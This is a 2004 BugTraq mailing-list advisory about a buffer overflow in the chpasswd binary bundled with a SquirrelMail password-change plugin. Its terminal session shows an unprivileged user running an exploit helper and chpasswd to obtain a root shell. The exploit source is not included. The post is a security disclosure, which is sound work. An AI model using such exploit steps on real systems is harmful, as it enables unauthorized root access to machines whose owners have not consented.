BugTraq
Squirrelmail Chpasswod bof Apr 17 2004 07:20AM
Matias Neiff (matias neiff com ar) (2 replies)
Hi all

There is a boffer over flow in the chpasswd binary, distributed with the
plugin. This allow to local's user to execute commands as a root.
---:::Prott:::---
root@orco:/mnt/hosting/hack/bof# su webmaster
webmaster@orco:/mnt/hosting/hack/bof$ ./exploit 166 5555 99999
Using address: 0xbfffe325
bash-2.05b$ ./chpasswd $RET asdf asdf
The new password is equal to old password. Choose another password.
sh-2.05b# id
uid=0(root) gid=3(sys) groups=500(webmaster)
sh-2.05b#
---:::end:::---

Bye all

[ reply ]
Re: Squirrelmail Chpasswod bof Apr 17 2004 09:31PM
Jonathan Angliss (jon squirrelmail org)
Re: Squirrelmail Chpasswod bof Apr 17 2004 07:38PM
martin f krafft (madduck madduck net)


 

Privacy Statement
Copyright 2010, SecurityFocus